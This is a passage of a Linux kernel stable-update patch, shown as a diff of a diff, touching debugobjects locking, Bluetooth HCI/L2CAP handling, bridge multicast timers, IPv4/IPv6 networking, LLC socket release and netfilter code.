++	if (unlikely(!obj)) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		debug_objects_oom();
++		return 0;
++	} else if (likely(!IS_ERR(obj))) {
+ 		switch (obj->state) {
+-		case ODEBUG_STATE_INIT:
+-		case ODEBUG_STATE_INACTIVE:
+-			obj->state = ODEBUG_STATE_ACTIVE;
+-			ret = 0;
+-			break;
+-
+ 		case ODEBUG_STATE_ACTIVE:
+-			state = obj->state;
+-			raw_spin_unlock_irqrestore(&db->lock, flags);
+-			debug_print_object(obj, "activate");
+-			ret = debug_object_fixup(descr->fixup_activate, addr, state);
+-			return ret ? 0 : -EINVAL;
+-
+ 		case ODEBUG_STATE_DESTROYED:
+-			print_object = true;
+-			ret = -EINVAL;
++			o = *obj;
+ 			break;
++		case ODEBUG_STATE_INIT:
++		case ODEBUG_STATE_INACTIVE:
++			obj->state = ODEBUG_STATE_ACTIVE;
++			fallthrough;
+ 		default:
+-			ret = 0;
+-			break;
++			raw_spin_unlock_irqrestore(&db->lock, flags);
++			return 0;
+ 		}
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		if (print_object)
+-			debug_print_object(obj, "activate");
+-		return ret;
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
++	debug_print_object(&o, "activate");
+ 
+-	/* If NULL the allocation has hit OOM */
+-	if (!obj) {
+-		debug_objects_oom();
+-		return 0;
++	switch (o.state) {
++	case ODEBUG_STATE_ACTIVE:
++	case ODEBUG_STATE_NOTAVAILABLE:
++		if (debug_object_fixup(descr->fixup_activate, addr, o.state))
++			return 0;
++		fallthrough;
++	default:
++		return -EINVAL;
+ 	}
+-
+-	/* Object is neither static nor tracked. It's not initialized */
+-	debug_print_object(&o, "activate");
+-	ret = debug_object_fixup(descr->fixup_activate, addr, ODEBUG_STATE_NOTAVAILABLE);
+-	return ret ? 0 : -EINVAL;
+ }
+ EXPORT_SYMBOL_GPL(debug_object_activate);
+ 
+@@ -759,10 +739,10 @@ EXPORT_SYMBOL_GPL(debug_object_activate);
+  */
+ void debug_object_deactivate(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+-	bool print_object = false;
+ 
+ 	if (!debug_objects_enabled)
+ 		return;
+@@ -774,33 +754,24 @@ void debug_object_deactivate(void *addr, const struct debug_obj_descr *descr)
+ 	obj = lookup_object(addr, db);
+ 	if (obj) {
+ 		switch (obj->state) {
++		case ODEBUG_STATE_DESTROYED:
++			break;
+ 		case ODEBUG_STATE_INIT:
+ 		case ODEBUG_STATE_INACTIVE:
+ 		case ODEBUG_STATE_ACTIVE:
+-			if (!obj->astate)
+-				obj->state = ODEBUG_STATE_INACTIVE;
+-			else
+-				print_object = true;
+-			break;
+-
+-		case ODEBUG_STATE_DESTROYED:
+-			print_object = true;
+-			break;
++			if (obj->astate)
++				break;
++			obj->state = ODEBUG_STATE_INACTIVE;
++			fallthrough;
+ 		default:
+-			break;
++			raw_spin_unlock_irqrestore(&db->lock, flags);
++			return;
+ 		}
++		o = *obj;
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (!obj) {
+-		struct debug_obj o = { .object = addr,
+-				       .state = ODEBUG_STATE_NOTAVAILABLE,
+-				       .descr = descr };
+-
+-		debug_print_object(&o, "deactivate");
+-	} else if (print_object) {
+-		debug_print_object(obj, "deactivate");
+-	}
++	debug_print_object(&o, "deactivate");
+ }
+ EXPORT_SYMBOL_GPL(debug_object_deactivate);
+ 
+@@ -811,11 +782,9 @@ EXPORT_SYMBOL_GPL(debug_object_deactivate);
+  */
+ void debug_object_destroy(void *addr, const struct debug_obj_descr *descr)
+ {
+-	enum debug_obj_state state;
++	struct debug_obj *obj, o;
+ 	struct debug_bucket *db;
+-	struct debug_obj *obj;
+ 	unsigned long flags;
+-	bool print_object = false;
+ 
+ 	if (!debug_objects_enabled)
+ 		return;
+@@ -825,32 +794,31 @@ void debug_object_destroy(void *addr, const struct debug_obj_descr *descr)
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+ 	obj = lookup_object(addr, db);
+-	if (!obj)
+-		goto out_unlock;
++	if (!obj) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		return;
++	}
+ 
+ 	switch (obj->state) {
++	case ODEBUG_STATE_ACTIVE:
++	case ODEBUG_STATE_DESTROYED:
++		break;
+ 	case ODEBUG_STATE_NONE:
+ 	case ODEBUG_STATE_INIT:
+ 	case ODEBUG_STATE_INACTIVE:
+ 		obj->state = ODEBUG_STATE_DESTROYED;
+-		break;
+-	case ODEBUG_STATE_ACTIVE:
+-		state = obj->state;
++		fallthrough;
++	default:
+ 		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		debug_print_object(obj, "destroy");
+-		debug_object_fixup(descr->fixup_destroy, addr, state);
+ 		return;
+-
+-	case ODEBUG_STATE_DESTROYED:
+-		print_object = true;
+-		break;
+-	default:
+-		break;
+ 	}
+-out_unlock:
++
++	o = *obj;
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (print_object)
+-		debug_print_object(obj, "destroy");
++	debug_print_object(&o, "destroy");
++
++	if (o.state == ODEBUG_STATE_ACTIVE)
++		debug_object_fixup(descr->fixup_destroy, addr, o.state);
+ }
+ EXPORT_SYMBOL_GPL(debug_object_destroy);
+ 
+@@ -861,9 +829,8 @@ EXPORT_SYMBOL_GPL(debug_object_destroy);
+  */
+ void debug_object_free(void *addr, const struct debug_obj_descr *descr)
+ {
+-	enum debug_obj_state state;
++	struct debug_obj *obj, o;
+ 	struct debug_bucket *db;
+-	struct debug_obj *obj;
+ 	unsigned long flags;
+ 
+ 	if (!debug_objects_enabled)
+@@ -874,24 +841,26 @@ void debug_object_free(void *addr, const struct debug_obj_descr *descr)
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+ 	obj = lookup_object(addr, db);
+-	if (!obj)
+-		goto out_unlock;
++	if (!obj) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		return;
++	}
+ 
+ 	switch (obj->state) {
+ 	case ODEBUG_STATE_ACTIVE:
+-		state = obj->state;
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		debug_print_object(obj, "free");
+-		debug_object_fixup(descr->fixup_free, addr, state);
+-		return;
++		break;
+ 	default:
+ 		hlist_del(&obj->node);
+ 		raw_spin_unlock_irqrestore(&db->lock, flags);
+ 		free_object(obj);
+ 		return;
+ 	}
+-out_unlock:
++
++	o = *obj;
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
++	debug_print_object(&o, "free");
++
++	debug_object_fixup(descr->fixup_free, addr, o.state);
+ }
+ EXPORT_SYMBOL_GPL(debug_object_free);
+ 
+@@ -943,10 +912,10 @@ void
+ debug_object_active_state(void *addr, const struct debug_obj_descr *descr,
+ 			  unsigned int expect, unsigned int next)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+-	bool print_object = false;
+ 
+ 	if (!debug_objects_enabled)
+ 		return;
+@@ -959,28 +928,19 @@ debug_object_active_state(void *addr, const struct debug_obj_descr *descr,
+ 	if (obj) {
+ 		switch (obj->state) {
+ 		case ODEBUG_STATE_ACTIVE:
+-			if (obj->astate == expect)
+-				obj->astate = next;
+-			else
+-				print_object = true;
+-			break;
+-
++			if (obj->astate != expect)
++				break;
++			obj->astate = next;
++			raw_spin_unlock_irqrestore(&db->lock, flags);
++			return;
+ 		default:
+-			print_object = true;
+ 			break;
+ 		}
++		o = *obj;
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (!obj) {
+-		struct debug_obj o = { .object = addr,
+-				       .state = ODEBUG_STATE_NOTAVAILABLE,
+-				       .descr = descr };
+-
+-		debug_print_object(&o, "active_state");
+-	} else if (print_object) {
+-		debug_print_object(obj, "active_state");
+-	}
++	debug_print_object(&o, "active_state");
+ }
+ EXPORT_SYMBOL_GPL(debug_object_active_state);
+ 
+@@ -988,12 +948,10 @@ EXPORT_SYMBOL_GPL(debug_object_active_state);
+ static void __debug_check_no_obj_freed(const void *address, unsigned long size)
+ {
+ 	unsigned long flags, oaddr, saddr, eaddr, paddr, chunks;
+-	const struct debug_obj_descr *descr;
+-	enum debug_obj_state state;
++	int cnt, objs_checked = 0;
++	struct debug_obj *obj, o;
+ 	struct debug_bucket *db;
+ 	struct hlist_node *tmp;
+-	struct debug_obj *obj;
+-	int cnt, objs_checked = 0;
+ 
+ 	saddr = (unsigned long) address;
+ 	eaddr = saddr + size;
+@@ -1015,12 +973,10 @@ repeat:
+ 
+ 			switch (obj->state) {
+ 			case ODEBUG_STATE_ACTIVE:
+-				descr = obj->descr;
+-				state = obj->state;
++				o = *obj;
+ 				raw_spin_unlock_irqrestore(&db->lock, flags);
+-				debug_print_object(obj, "free");
+-				debug_object_fixup(descr->fixup_free,
+-						   (void *) oaddr, state);
++				debug_print_object(&o, "free");
++				debug_object_fixup(o.descr->fixup_free, (void *)oaddr, o.state);
+ 				goto repeat;
+ 			default:
+ 				hlist_del(&obj->node);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index d74fe13f3dceb..45d19294aa772 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -3780,12 +3780,14 @@ static int hci_set_event_mask_sync(struct hci_dev *hdev)
+ 	if (lmp_bredr_capable(hdev)) {
+ 		events[4] |= 0x01; /* Flow Specification Complete */
+ 
+-		/* Don't set Disconnect Complete when suspended as that
+-		 * would wakeup the host when disconnecting due to
+-		 * suspend.
++		/* Don't set Disconnect Complete and mode change when
++		 * suspended as that would wakeup the host when disconnecting
++		 * due to suspend.
+ 		 */
+-		if (hdev->suspended)
++		if (hdev->suspended) {
+ 			events[0] &= 0xef;
++			events[2] &= 0xf7;
++		}
+ 	} else {
+ 		/* Use a different default for LE-only devices */
+ 		memset(events, 0, sizeof(events));
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 4c5793053393f..81f5974e5eb5a 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -6527,7 +6527,8 @@ static inline void l2cap_sig_channel(struct l2cap_conn *conn,
+ 		if (len > skb->len || !cmd->ident) {
+ 			BT_DBG("corrupted command");
+ 			l2cap_sig_send_rej(conn, cmd->ident);
+-			break;
++			skb_pull(skb, len > skb->len ? skb->len : len);
++			continue;
+ 		}
+ 
+ 		err = l2cap_bredr_sig_cmd(conn, cmd, len, skb->data);
+diff --git a/net/bridge/br_cfm_netlink.c b/net/bridge/br_cfm_netlink.c
+index 5c4c369f8536e..2faab44652e7c 100644
+--- a/net/bridge/br_cfm_netlink.c
++++ b/net/bridge/br_cfm_netlink.c
+@@ -362,7 +362,7 @@ static int br_cc_ccm_tx_parse(struct net_bridge *br, struct nlattr *attr,
+ 
+ 	memset(&tx_info, 0, sizeof(tx_info));
+ 
+-	instance = nla_get_u32(tb[IFLA_BRIDGE_CFM_CC_RDI_INSTANCE]);
++	instance = nla_get_u32(tb[IFLA_BRIDGE_CFM_CC_CCM_TX_INSTANCE]);
+ 	nla_memcpy(&tx_info.dmac.addr,
+ 		   tb[IFLA_BRIDGE_CFM_CC_CCM_TX_DMAC],
+ 		   sizeof(tx_info.dmac.addr));
+diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c
+index db4f2641d1cd1..9765f9f9bf7ff 100644
+--- a/net/bridge/br_multicast.c
++++ b/net/bridge/br_multicast.c
+@@ -1607,6 +1607,10 @@ static void br_ip6_multicast_querier_expired(struct timer_list *t)
+ }
+ #endif
+ 
++static void br_multicast_query_delay_expired(struct timer_list *t)
++{
++}
++
+ static void br_multicast_select_own_querier(struct net_bridge_mcast *brmctx,
+ 					    struct br_ip *ip,
+ 					    struct sk_buff *skb)
+@@ -3024,7 +3028,7 @@ br_multicast_update_query_timer(struct net_bridge_mcast *brmctx,
+ 				unsigned long max_delay)
+ {
+ 	if (!timer_pending(&query->timer))
+-		query->delay_time = jiffies + max_delay;
++		mod_timer(&query->delay_timer, jiffies + max_delay);
+ 
+ 	mod_timer(&query->timer, jiffies + brmctx->multicast_querier_interval);
+ }
+@@ -3867,13 +3871,11 @@ void br_multicast_ctx_init(struct net_bridge *br,
+ 	brmctx->multicast_querier_interval = 255 * HZ;
+ 	brmctx->multicast_membership_interval = 260 * HZ;
+ 
+-	brmctx->ip4_other_query.delay_time = 0;
+ 	brmctx->ip4_querier.port_ifidx = 0;
+ 	seqcount_spinlock_init(&brmctx->ip4_querier.seq, &br->multicast_lock);
+ 	brmctx->multicast_igmp_version = 2;
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	brmctx->multicast_mld_version = 1;
+-	brmctx->ip6_other_query.delay_time = 0;
+ 	brmctx->ip6_querier.port_ifidx = 0;
+ 	seqcount_spinlock_init(&brmctx->ip6_querier.seq, &br->multicast_lock);
+ #endif
+@@ -3882,6 +3884,8 @@ void br_multicast_ctx_init(struct net_bridge *br,
+ 		    br_ip4_multicast_local_router_expired, 0);
+ 	timer_setup(&brmctx->ip4_other_query.timer,
+ 		    br_ip4_multicast_querier_expired, 0);
++	timer_setup(&brmctx->ip4_other_query.delay_timer,
++		    br_multicast_query_delay_expired, 0);
+ 	timer_setup(&brmctx->ip4_own_query.timer,
+ 		    br_ip4_multicast_query_expired, 0);
+ #if IS_ENABLED(CONFIG_IPV6)
+@@ -3889,6 +3893,8 @@ void br_multicast_ctx_init(struct net_bridge *br,
+ 		    br_ip6_multicast_local_router_expired, 0);
+ 	timer_setup(&brmctx->ip6_other_query.timer,
+ 		    br_ip6_multicast_querier_expired, 0);
++	timer_setup(&brmctx->ip6_other_query.delay_timer,
++		    br_multicast_query_delay_expired, 0);
+ 	timer_setup(&brmctx->ip6_own_query.timer,
+ 		    br_ip6_multicast_query_expired, 0);
+ #endif
+@@ -4023,10 +4029,12 @@ static void __br_multicast_stop(struct net_bridge_mcast *brmctx)
+ {
+ 	del_timer_sync(&brmctx->ip4_mc_router_timer);
+ 	del_timer_sync(&brmctx->ip4_other_query.timer);
++	del_timer_sync(&brmctx->ip4_other_query.delay_timer);
+ 	del_timer_sync(&brmctx->ip4_own_query.timer);
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	del_timer_sync(&brmctx->ip6_mc_router_timer);
+ 	del_timer_sync(&brmctx->ip6_other_query.timer);
++	del_timer_sync(&brmctx->ip6_other_query.delay_timer);
+ 	del_timer_sync(&brmctx->ip6_own_query.timer);
+ #endif
+ }
+@@ -4469,13 +4477,15 @@ int br_multicast_set_querier(struct net_bridge_mcast *brmctx, unsigned long val)
+ 	max_delay = brmctx->multicast_query_response_interval;
+ 
+ 	if (!timer_pending(&brmctx->ip4_other_query.timer))
+-		brmctx->ip4_other_query.delay_time = jiffies + max_delay;
++		mod_timer(&brmctx->ip4_other_query.delay_timer,
++			  jiffies + max_delay);
+ 
+ 	br_multicast_start_querier(brmctx, &brmctx->ip4_own_query);
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	if (!timer_pending(&brmctx->ip6_other_query.timer))
+-		brmctx->ip6_other_query.delay_time = jiffies + max_delay;
++		mod_timer(&brmctx->ip6_other_query.delay_timer,
++			  jiffies + max_delay);
+ 
+ 	br_multicast_start_querier(brmctx, &brmctx->ip6_own_query);
+ #endif
+diff --git a/net/bridge/br_private.h b/net/bridge/br_private.h
+index 06e5f6faa4313..51d010f64e066 100644
+--- a/net/bridge/br_private.h
++++ b/net/bridge/br_private.h
+@@ -77,7 +77,7 @@ struct bridge_mcast_own_query {
+ /* other querier */
+ struct bridge_mcast_other_query {
+ 	struct timer_list		timer;
+-	unsigned long			delay_time;
++	struct timer_list		delay_timer;
+ };
+ 
+ /* selected querier */
+@@ -1083,7 +1083,7 @@ __br_multicast_querier_exists(struct net_bridge_mcast *brmctx,
+ 		own_querier_enabled = false;
+ 	}
+ 
+-	return time_is_before_jiffies(querier->delay_time) &&
++	return !timer_pending(&querier->delay_timer) &&
+ 	       (own_querier_enabled || timer_pending(&querier->timer));
+ }
+ 
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index e19ef88ae181f..a6d460aaee794 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -1268,6 +1268,12 @@ static int ip_setup_cork(struct sock *sk, struct inet_cork *cork,
+ 	if (unlikely(!rt))
+ 		return -EFAULT;
+ 
++	cork->fragsize = ip_sk_use_pmtu(sk) ?
++			 dst_mtu(&rt->dst) : READ_ONCE(rt->dst.dev->mtu);
++
++	if (!inetdev_valid_mtu(cork->fragsize))
++		return -ENETUNREACH;
++
+ 	/*
+ 	 * setup for corking.
+ 	 */
+@@ -1284,12 +1290,6 @@ static int ip_setup_cork(struct sock *sk, struct inet_cork *cork,
+ 		cork->addr = ipc->addr;
+ 	}
+ 
+-	cork->fragsize = ip_sk_use_pmtu(sk) ?
+-			 dst_mtu(&rt->dst) : READ_ONCE(rt->dst.dev->mtu);
+-
+-	if (!inetdev_valid_mtu(cork->fragsize))
+-		return -ENETUNREACH;
+-
+ 	cork->gso_size = ipc->gso_size;
+ 
+ 	cork->dst = &rt->dst;
+diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
+index c1fb7580ea581..a00ba2d51e1b2 100644
+--- a/net/ipv4/ip_sockglue.c
++++ b/net/ipv4/ip_sockglue.c
+@@ -1406,12 +1406,13 @@ e_inval:
+  * ipv4_pktinfo_prepare - transfer some info from rtable to skb
+  * @sk: socket
+  * @skb: buffer
++ * @drop_dst: if true, drops skb dst
+  *
+  * To support IP_CMSG_PKTINFO option, we store rt_iif and specific
+  * destination in skb->cb[] before dst drop.
+  * This way, receiver doesn't make cache line misses to read rtable.
+  */
+-void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb)
++void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb, bool drop_dst)
+ {
+ 	struct in_pktinfo *pktinfo = PKTINFO_SKB_CB(skb);
+ 	bool prepare = (inet_sk(sk)->cmsg_flags & IP_CMSG_PKTINFO) ||
+@@ -1440,7 +1441,8 @@ void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb)
+ 		pktinfo->ipi_ifindex = 0;
+ 		pktinfo->ipi_spec_dst.s_addr = 0;
+ 	}
+-	skb_dst_drop(skb);
++	if (drop_dst)
++		skb_dst_drop(skb);
+ }
+ 
+ int ip_setsockopt(struct sock *sk, int level, int optname, sockptr_t optval,
+diff --git a/net/ipv4/ipmr.c b/net/ipv4/ipmr.c
+index b807197475a57..d5421c38c2aae 100644
+--- a/net/ipv4/ipmr.c
++++ b/net/ipv4/ipmr.c
+@@ -1073,7 +1073,7 @@ static int ipmr_cache_report(const struct mr_table *mrt,
+ 		msg = (struct igmpmsg *)skb_network_header(skb);
+ 		msg->im_vif = vifi;
+ 		msg->im_vif_hi = vifi >> 8;
+-		ipv4_pktinfo_prepare(mroute_sk, pkt);
++		ipv4_pktinfo_prepare(mroute_sk, pkt, false);
+ 		memcpy(skb->cb, pkt->cb, sizeof(skb->cb));
+ 		/* Add our header */
+ 		igmp = skb_put(skb, sizeof(struct igmphdr));
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 639aa5abda9dd..7c63b91edbf7a 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -286,11 +286,13 @@ void raw_icmp_error(struct sk_buff *skb, int protocol, u32 info)
+ 
+ static int raw_rcv_skb(struct sock *sk, struct sk_buff *skb)
+ {
++	enum skb_drop_reason reason;
++
+ 	/* Charge it to the socket. */
+ 
+-	ipv4_pktinfo_prepare(sk, skb);
+-	if (sock_queue_rcv_skb(sk, skb) < 0) {
+-		kfree_skb(skb);
++	ipv4_pktinfo_prepare(sk, skb, true);
++	if (sock_queue_rcv_skb_reason(sk, skb, &reason) < 0) {
++		kfree_skb_reason(skb, reason);
+ 		return NET_RX_DROP;
+ 	}
+ 
+@@ -301,7 +303,7 @@ int raw_rcv(struct sock *sk, struct sk_buff *skb)
+ {
+ 	if (!xfrm4_policy_check(sk, XFRM_POLICY_IN, skb)) {
+ 		atomic_inc(&sk->sk_drops);
+-		kfree_skb(skb);
++		kfree_skb_reason(skb, SKB_DROP_REASON_XFRM_POLICY);
+ 		return NET_RX_DROP;
+ 	}
+ 	nf_reset_ct(skb);
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 90e24c3f65570..86e7695d91adf 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -1934,7 +1934,17 @@ static skb_frag_t *skb_advance_to_frag(struct sk_buff *skb, u32 offset_skb,
+ 
+ static bool can_map_frag(const skb_frag_t *frag)
+ {
+-	return skb_frag_size(frag) == PAGE_SIZE && !skb_frag_off(frag);
++	struct page *page;
++
++	if (skb_frag_size(frag) != PAGE_SIZE || skb_frag_off(frag))
++		return false;
++
++	page = skb_frag_page(frag);
++
++	if (PageCompound(page) || page->mapping)
++		return false;
++
++	return true;
+ }
+ 
+ static int find_next_mappable_frag(const skb_frag_t *frag,
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 11c0e1c666429..87d759bab0012 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -2196,7 +2196,7 @@ static int udp_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 
+ 	udp_csum_pull_header(skb);
+ 
+-	ipv4_pktinfo_prepare(sk, skb);
++	ipv4_pktinfo_prepare(sk, skb, true);
+ 	return __udp_queue_rcv_skb(sk, skb);
+ 
+ csum_error:
+diff --git a/net/ipv6/addrconf_core.c b/net/ipv6/addrconf_core.c
+index 507a8353a6bdb..c008d21925d7f 100644
+--- a/net/ipv6/addrconf_core.c
++++ b/net/ipv6/addrconf_core.c
+@@ -220,19 +220,26 @@ const struct ipv6_stub *ipv6_stub __read_mostly = &(struct ipv6_stub) {
+ EXPORT_SYMBOL_GPL(ipv6_stub);
+ 
+ /* IPv6 Wildcard Address and Loopback Address defined by RFC2553 */
+-const struct in6_addr in6addr_loopback = IN6ADDR_LOOPBACK_INIT;
++const struct in6_addr in6addr_loopback __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_LOOPBACK_INIT;
+ EXPORT_SYMBOL(in6addr_loopback);
+-const struct in6_addr in6addr_any = IN6ADDR_ANY_INIT;
++const struct in6_addr in6addr_any __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_ANY_INIT;
+ EXPORT_SYMBOL(in6addr_any);
+-const struct in6_addr in6addr_linklocal_allnodes = IN6ADDR_LINKLOCAL_ALLNODES_INIT;
++const struct in6_addr in6addr_linklocal_allnodes __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_LINKLOCAL_ALLNODES_INIT;
+ EXPORT_SYMBOL(in6addr_linklocal_allnodes);
+-const struct in6_addr in6addr_linklocal_allrouters = IN6ADDR_LINKLOCAL_ALLROUTERS_INIT;
++const struct in6_addr in6addr_linklocal_allrouters __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_LINKLOCAL_ALLROUTERS_INIT;
+ EXPORT_SYMBOL(in6addr_linklocal_allrouters);
+-const struct in6_addr in6addr_interfacelocal_allnodes = IN6ADDR_INTERFACELOCAL_ALLNODES_INIT;
++const struct in6_addr in6addr_interfacelocal_allnodes __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_INTERFACELOCAL_ALLNODES_INIT;
+ EXPORT_SYMBOL(in6addr_interfacelocal_allnodes);
+-const struct in6_addr in6addr_interfacelocal_allrouters = IN6ADDR_INTERFACELOCAL_ALLROUTERS_INIT;
++const struct in6_addr in6addr_interfacelocal_allrouters __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_INTERFACELOCAL_ALLROUTERS_INIT;
+ EXPORT_SYMBOL(in6addr_interfacelocal_allrouters);
+-const struct in6_addr in6addr_sitelocal_allrouters = IN6ADDR_SITELOCAL_ALLROUTERS_INIT;
++const struct in6_addr in6addr_sitelocal_allrouters __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_SITELOCAL_ALLROUTERS_INIT;
+ EXPORT_SYMBOL(in6addr_sitelocal_allrouters);
+ 
+ static void snmp6_free_dev(struct inet6_dev *idev)
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index 9125e92d9917e..2699915bb85be 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -796,8 +796,8 @@ static int __ip6_tnl_rcv(struct ip6_tnl *tunnel, struct sk_buff *skb,
+ 						struct sk_buff *skb),
+ 			 bool log_ecn_err)
+ {
+-	const struct ipv6hdr *ipv6h = ipv6_hdr(skb);
+-	int err;
++	const struct ipv6hdr *ipv6h;
++	int nh, err;
+ 
+ 	if ((!(tpi->flags & TUNNEL_CSUM) &&
+ 	     (tunnel->parms.i_flags & TUNNEL_CSUM)) ||
+@@ -829,7 +829,6 @@ static int __ip6_tnl_rcv(struct ip6_tnl *tunnel, struct sk_buff *skb,
+ 			goto drop;
+ 		}
+ 
+-		ipv6h = ipv6_hdr(skb);
+ 		skb->protocol = eth_type_trans(skb, tunnel->dev);
+ 		skb_postpull_rcsum(skb, eth_hdr(skb), ETH_HLEN);
+ 	} else {
+@@ -837,7 +836,23 @@ static int __ip6_tnl_rcv(struct ip6_tnl *tunnel, struct sk_buff *skb,
+ 		skb_reset_mac_header(skb);
+ 	}
+ 
++	/* Save offset of outer header relative to skb->head,
++	 * because we are going to reset the network header to the inner header
++	 * and might change skb->head.
++	 */
++	nh = skb_network_header(skb) - skb->head;
++
+ 	skb_reset_network_header(skb);
++
++	if (!pskb_inet_may_pull(skb)) {
++		DEV_STATS_INC(tunnel->dev, rx_length_errors);
++		DEV_STATS_INC(tunnel->dev, rx_errors);
++		goto drop;
++	}
++
++	/* Get the outer header. */
++	ipv6h = (struct ipv6hdr *)(skb->head + nh);
++
+ 	memset(skb->cb, 0, sizeof(struct inet6_skb_parm));
+ 
+ 	__skb_tunnel_rx(skb, tunnel->dev, tunnel->net);
+diff --git a/net/llc/af_llc.c b/net/llc/af_llc.c
+index 19c478bd85bd8..8e3be0009f609 100644
+--- a/net/llc/af_llc.c
++++ b/net/llc/af_llc.c
+@@ -226,6 +226,8 @@ static int llc_ui_release(struct socket *sock)
+ 	}
+ 	netdev_put(llc->dev, &llc->dev_tracker);
+ 	sock_put(sk);
++	sock_orphan(sk);
++	sock->sk = NULL;
+ 	llc_sk_free(sk);
+ out:
+ 	return 0;
+diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
+index 3ac1af6f59fcc..e0092bf273fd0 100644
+--- a/net/netfilter/nf_conntrack_proto_tcp.c
++++ b/net/netfilter/nf_conntrack_proto_tcp.c
+@@ -457,7 +457,8 @@ static void tcp_init_sender(struct ip_ct_tcp_state *sender,
+ 			    const struct sk_buff *skb,
+ 			    unsigned int dataoff,
+ 			    const struct tcphdr *tcph,
+-			    u32 end, u32 win)
++			    u32 end, u32 win,
++			    enum ip_conntrack_dir dir)
+ {
+ 	/* SYN-ACK in reply to a SYN
+ 	 * or SYN from reply direction in simultaneous open.
+@@ -471,7 +472,8 @@ static void tcp_init_sender(struct ip_ct_tcp_state *sender,
+ 	 * Both sides must send the Window Scale option
+ 	 * to enable window scaling in either direction.
+ 	 */
+-	if (!(sender->flags & IP_CT_TCP_FLAG_WINDOW_SCALE &&
++	if (dir == IP_CT_DIR_REPLY &&
++	    !(sender->flags & IP_CT_TCP_FLAG_WINDOW_SCALE &&
+ 	      receiver->flags & IP_CT_TCP_FLAG_WINDOW_SCALE)) {
+ 		sender->td_scale = 0;
+ 		receiver->td_scale = 0;
+@@ -542,7 +544,7 @@ tcp_in_window(struct nf_conn *ct, enum ip_conntrack_dir dir,
+ 		if (tcph->syn) {
+ 			tcp_init_sender(sender, receiver,
+ 					skb, dataoff, tcph,
+-					end, win);
++					end, win, dir);
+ 			if (!tcph->ack)
+ 				/* Simultaneous open */
+ 				return NFCT_TCP_ACCEPT;
+@@ -585,7 +587,7 @@ tcp_in_window(struct nf_conn *ct, enum ip_conntrack_dir dir,
+ 		 */
+ 		tcp_init_sender(sender, receiver,
+ 				skb, dataoff, tcph,
+-				end, win);
++				end, win, dir);
+ 
+ 		if (dir == IP_CT_DIR_REPLY && !tcph->ack)
+ 			return NFCT_TCP_ACCEPT;
+diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
+index 8a29290149bd7..be93a02497d6c 100644
+--- a/net/netfilter/nf_log.c
++++ b/net/netfilter/nf_log.c
+@@ -193,11 +193,12 @@ void nf_logger_put(int pf, enum nf_log_type type)
+ 		return;
+ 	}
+ 
+-	BUG_ON(loggers[pf][type] == NULL);
+-
+ 	rcu_read_lock();
+ 	logger = rcu_dereference(loggers[pf][type]);
+-	module_put(logger->me);
++	if (!logger)
++		WARN_ON_ONCE(1);
++	else
++		module_put(logger->me);
+ 	rcu_read_unlock();
+ }
+ EXPORT_SYMBOL_GPL(nf_logger_put);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 1edb2138260a8..49acb89ba9c56 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -7129,11 +7129,15 @@ nla_put_failure:
+ 	return -1;
+ }
